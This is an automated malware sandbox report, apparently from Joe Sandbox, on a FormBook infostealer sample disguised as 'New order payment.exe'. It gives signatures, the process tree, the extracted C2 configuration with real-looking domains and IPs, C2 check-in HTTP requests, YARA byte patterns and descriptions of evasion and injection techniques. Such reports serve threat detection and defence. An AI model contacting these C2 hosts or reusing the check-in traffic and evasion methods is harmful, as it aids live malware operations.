
Windows Analysis Report New order payment.exe

Overview

General Information

Sample Name: New order payment.exe
Analysis ID: 510241
MD5: 0c301355b11c3bc570d18b02bb7c99d8
SHA1: b35295390555e6fc0b85d538dafbfb4cf8c68564
SHA256: 77abd0b0f20b0ca86c241acf5d5d60188362e75213f894b7bea82c8f75a3c1b1
Tags: exe, formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sigma detected: Suspect Svchost Activity
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
Injects a PE file into a foreign processes
Sigma detected: Suspicious Svchost Process
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Process Tree

  • System is w10x64
  • New order payment.exe (PID: 4912 cmdline: 'C:\Users\user\Desktop\New order payment.exe' MD5: 0C301355B11C3BC570D18B02BB7C99D8)
    • New order payment.exe (PID: 2372 cmdline: 'C:\Users\user\Desktop\New order payment.exe' MD5: 0C301355B11C3BC570D18B02BB7C99D8)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • svchost.exe (PID: 2600 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
          • cmd.exe (PID: 6196 cmdline: /c del 'C:\Users\user\Desktop\New order payment.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.crisisinterventionadvocates.com/u9xn/"], "decoy": ["lifeguardingcoursenearme.com", "bolsaspapelcdmx.com", "parsleypkllqu.xyz", "68134.online", "shopthatlookboutique.com", "canlibahisportal.com", "oligopoly.city", "srchwithus.online", "151motors.com", "17yue.info", "auntmarysnj.com", "hanansalman.com", "heyunshangcheng.info", "doorslamersplus.com", "sfcn-dng.com", "highvizpeople.com", "seoexpertinbangladesh.com", "christinegagnonjewellery.com", "artifactorie.biz", "mre3.net", "webbyteanalysis.online", "medicmir.store", "shdxh.com", "salvationshippingsecurity.com", "michita.xyz", "itskosi.com", "aligncoachingconsulting.com", "cryptorickclub.art", "cyliamartisbackup.com", "ttemola.com", "mujeresenfarmalatam.com", "mykombuchafactory.com", "irasutoya-ryou.com", "envtmyouliqy.mobi", "expert-rse.com", "oddanimalsink.com", "piezoelectricenergy.com", "itservices-india.com", "wintwiin.com", "umgaleloacademy.com", "everythangbutwhite.com", "ishhs.xyz", "brandsofcannabis.com", "sculptingstones.com", "hilldetailingllc.com", "stone-project.net", "rbrituelbeaute.com", "atzoom.store", "pronogtiki.store", "baybeg.com", "b148tlrfee9evtvorgm5947.com", "msjanej.com", "western-overseas.info", "sharpecommunications.com", "atlantahomesforcarguys.com", "neosudo.com", "blulacedefense.com", "profilecolombia.com", "blacksaltspain.com", "sejiw3.xyz", "saint444.com", "getoken.net", "joycegsy.com", "fezora.xyz"]}

Yara Overview

Memory Dumps

Source: 00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmp; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmp; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmp; Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
  • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
  • 0x16af8:$sqlite3text: 68 38 2A 90 C5
  • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
  • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000001.00000002.299937698.00000000008B0000.00000040.00020000.sdmp; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 00000001.00000002.299937698.00000000008B0000.00000040.00020000.sdmp; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
31 further memory dump entries not shown.

Unpacked PEs

Source: 1.2.New order payment.exe.400000.0.unpack; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 1.2.New order payment.exe.400000.0.unpack; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 1.2.New order payment.exe.400000.0.unpack; Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
  • 0x15cc9:$sqlite3step: 68 34 1C 7B E1
  • 0x15ddc:$sqlite3step: 68 34 1C 7B E1
  • 0x15cf8:$sqlite3text: 68 38 2A 90 C5
  • 0x15e1d:$sqlite3text: 68 38 2A 90 C5
  • 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
Source: 1.0.New order payment.exe.400000.6.unpack; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 1.0.New order payment.exe.400000.6.unpack; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
28 further unpacked PE entries not shown.

Sigma Overview

System Summary:

Sigma detected: Suspect Svchost Activity
Source: Process started; Author: David Burkett; Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3472, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 2600
Sigma detected: Suspicious Svchost Process
Source: Process started; Author: Florian Roth; Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3472, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 2600
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process started; Author: vburov; Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3472, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 2600

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmp; Malware Configuration Extractor: FormBook (configuration as listed under Malware Configuration above)
Yara detected FormBook
Source: Yara match; File source: 1.2.New order payment.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.0.New order payment.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.1.New order payment.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.New order payment.exe.f020000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.1.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.0.New order payment.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.0.New order payment.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.0.New order payment.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.0.New order payment.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.New order payment.exe.f020000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.299937698.00000000008B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000000.276617394.000000000FA2C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.247641891.000000000F020000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000000.243344701.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.299991453.0000000000910000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000E.00000002.501581822.0000000000C50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000E.00000002.502016177.0000000002C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000000.289468709.000000000FA2C000.00000040.00020000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.sejiw3.xyz/u9xn/?EvGDLnJ=Mi491nAN/W8j69kCQou8To2ktmeGxZt9RYONiJPW2rEgEezOpzjOfOleU2kzp5ym9Hqq&5j=0BKPgh7X4n; Avira URL Cloud: Label: phishing
Machine Learning detection for sample
Source: New order payment.exe; Joe Sandbox ML: detected
Source: 1.0.New order payment.exe.400000.3.unpack; Avira: Label: TR/Patched.Ren.Gen2
Source: 1.0.New order payment.exe.400000.0.unpack; Avira: Label: TR/Patched.Ren.Gen2
Source: 1.2.New order payment.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.0.New order payment.exe.400000.2.unpack; Avira: Label: TR/Patched.Ren.Gen2
Source: 1.0.New order payment.exe.400000.6.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 14.2.svchost.exe.3015000.1.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 1.0.New order payment.exe.400000.1.unpack; Avira: Label: TR/Patched.Ren.Gen2
Source: 1.1.New order payment.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.0.New order payment.exe.400000.4.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.0.New order payment.exe.400000.5.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 14.2.svchost.exe.3d3796c.4.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.New order payment.exe.f020000.2.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: New order payment.exe; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wntdll.pdbUGP source: New order payment.exe, 00000000.00000003.242757682.000000000F1F0000.00000004.00000001.sdmp, New order payment.exe, 00000001.00000003.244051355.0000000000630000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.503827179.000000000391F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: New order payment.exe, svchost.exe
Source: Binary string: svchost.pdb source: New order payment.exe, 00000001.00000002.301223099.00000000026E0000.00000040.00020000.sdmp
Source: Binary string: svchost.pdbUGP source: New order payment.exe, 00000001.00000002.301223099.00000000026E0000.00000040.00020000.sdmp
Source: C:\Users\user\Desktop\New order payment.exe; Code function: 0_2_00405E93 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\New order payment.exe; Code function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\New order payment.exe; Code function: 0_2_00402671 FindFirstFileA,
Source: C:\Users\user\Desktop\New order payment.exe; Code function: 4x nop then pop ebx
Source: C:\Users\user\Desktop\New order payment.exe; Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\svchost.exe; Code function: 4x nop then pop ebx

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49755 -> 51.210.240.92:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49755 -> 51.210.240.92:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49755 -> 51.210.240.92:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49791 -> 74.208.236.134:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49791 -> 74.208.236.134:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49791 -> 74.208.236.134:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49798 -> 35.241.55.103:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49798 -> 35.241.55.103:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49798 -> 35.241.55.103:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49800 -> 52.210.179.84:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49800 -> 52.210.179.84:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49800 -> 52.210.179.84:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe; Domain query: www.hanansalman.com
Source: C:\Windows\explorer.exe; Domain query: www.sejiw3.xyz
Source: C:\Windows\explorer.exe; Domain query: www.crisisinterventionadvocates.com
Source: C:\Windows\explorer.exe; Network Connect: 137.184.31.35 80
Source: C:\Windows\explorer.exe; Network Connect: 160.153.136.3 80
Source: C:\Windows\explorer.exe; Domain query: www.srchwithus.online
Source: C:\Windows\explorer.exe; Domain query: www.heyunshangcheng.info
Source: C:\Windows\explorer.exe; Network Connect: 51.210.240.92 80
Source: C:\Windows\explorer.exe; Network Connect: 74.208.236.134 80
Source: C:\Windows\explorer.exe; Network Connect: 3.67.234.155 80
Source: C:\Windows\explorer.exe; Network Connect: 35.241.55.103 80
Source: C:\Windows\explorer.exe; Domain query: www.christinegagnonjewellery.com
Source: C:\Windows\explorer.exe; Domain query: www.mykombuchafactory.com
Source: C:\Windows\explorer.exe; Domain query: www.itskosi.com
Source: C:\Windows\explorer.exe; Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe; Domain query: www.salvationshippingsecurity.com
Source: C:\Windows\explorer.exe; Domain query: www.sfcn-dng.com
Source: C:\Windows\explorer.exe; Domain query: www.umgaleloacademy.com
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe; DNS query: www.sejiw3.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: www.crisisinterventionadvocates.com/u9xn/
Source: Joe Sandbox View; ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View; ASN Name: PANDGUS PANDGUS
Source: Joe Sandbox View; ASN Name: GODADDY-AMSDE GODADDY-AMSDE
Source: global traffic; HTTP traffic detected: GET /u9xn/?EvGDLnJ=eYxsMd5wljUn1Fg6115NyaMNAPOWoN8Xbg1oh/XArMcWaLbikdCkMKkIXUVVkDc1SuQ5&5j=0BKPgh7X4n HTTP/1.1; Host: www.salvationshippingsecurity.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /u9xn/?EvGDLnJ=RrR08BH4oIo+gx361vOF46QRRg434M3aJQMobyGncW6ZpM1n/iVBy8ajhiKV3UdnqaZn&5j=0BKPgh7X4n HTTP/1.1; Host: www.heyunshangcheng.info; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /u9xn/?EvGDLnJ=LAjf/xx2BjlKOSx2Nw0FybGnOLdFfrA16q3xOuIsu5dbrvvju1demR4HH9h71lmoA2bo&5j=0BKPgh7X4n HTTP/1.1; Host: www.crisisinterventionadvocates.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /u9xn/?EvGDLnJ=Js+sgmRaIVUq7qFzsJAJ+9AXXLZC0X79cc7qqoZBkLaFxYs1smoq8VOLmQUttipLhfLz&5j=0BKPgh7X4n HTTP/1.1; Host: www.srchwithus.online; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /u9xn/?EvGDLnJ=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&5j=0BKPgh7X4n HTTP/1.1; Host: www.itskosi.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /u9xn/?EvGDLnJ=Mi491nAN/W8j69kCQou8To2ktmeGxZt9RYONiJPW2rEgEezOpzjOfOleU2kzp5ym9Hqq&5j=0BKPgh7X4n HTTP/1.1; Host: www.sejiw3.xyz; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /u9xn/?EvGDLnJ=FQ+FDzcRNFqTHDas5QzX/ZxEACq3iyWpSRLff56TNweY9Uo4XxUeKhcbnwpchSkctfqz&5j=0BKPgh7X4n HTTP/1.1; Host: www.hanansalman.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: Joe Sandbox View; IP Address: 160.153.136.3 160.153.136.3
Source: global traffic; HTTP traffic detected: HTTP/1.1 403 Forbidden; Server: openresty; Date: Wed, 27 Oct 2021 14:20:27 GMT; Content-Type: text/html; Content-Length: 275; ETag: "61704c6b-113"; Via: 1.1 google; Connection: close; Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Content-Type: text/html; Content-Length: 626; Connection: close; Date: Wed, 27 Oct 2021 14:20:38 GMT; Server: Apache; Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
Source: svchost.exe, 0000000E.00000002.505372144.0000000003EB2000.00000004.00020000.sdmp; String found in binary or memory: http://181ue.com/sq.html?entry=
Source: New order payment.exe; String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: New order payment.exe; String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: svchost.exe, 0000000E.00000002.505372144.0000000003EB2000.00000004.00020000.sdmp; String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
Source: svchost.exe, 0000000E.00000002.505372144.0000000003EB2000.00000004.00020000.sdmp; String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
Source: svchost.exe, 0000000E.00000002.505372144.0000000003EB2000.00000004.00020000.sdmp; String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
Source: svchost.exe, 0000000E.00000002.505372144.0000000003EB2000.00000004.00020000.sdmp; String found in binary or memory: https://hm.baidu.com/hm.js?
Source: svchost.exe, 0000000E.00000002.505372144.0000000003EB2000.00000004.00020000.sdmp; String found in binary or memory: https://pre-mpnewyear.uc.cn/iceberg/page/log?domain=
Source: svchost.exe, 0000000E.00000002.505372144.0000000003EB2000.00000004.00020000.sdmp; String found in binary or memory: https://track.uc.cn/collect
Source: unknown; DNS traffic detected: queries for: www.salvationshippingsecurity.com
Source: New order payment.exe, 00000000.00000002.244197590.000000000074A000.00000004.00000020.sdmp; Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\Desktop\New order payment.exe; Code function: 0_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 1.2.New order payment.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.New order payment.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.1.New order payment.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.New order payment.exe.f020000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.1.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.New order payment.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.New order payment.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.New order payment.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.New order payment.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.New order payment.exe.f020000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.299937698.00000000008B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000000.276617394.000000000FA2C000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.247641891.000000000F020000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000000.243344701.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.299991453.0000000000910000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000E.00000002.501581822.0000000000C50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000E.00000002.502016177.0000000002C90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000000.289468709.000000000FA2C000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 1.2.New order payment.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.New order payment.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 1.0.New order payment.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
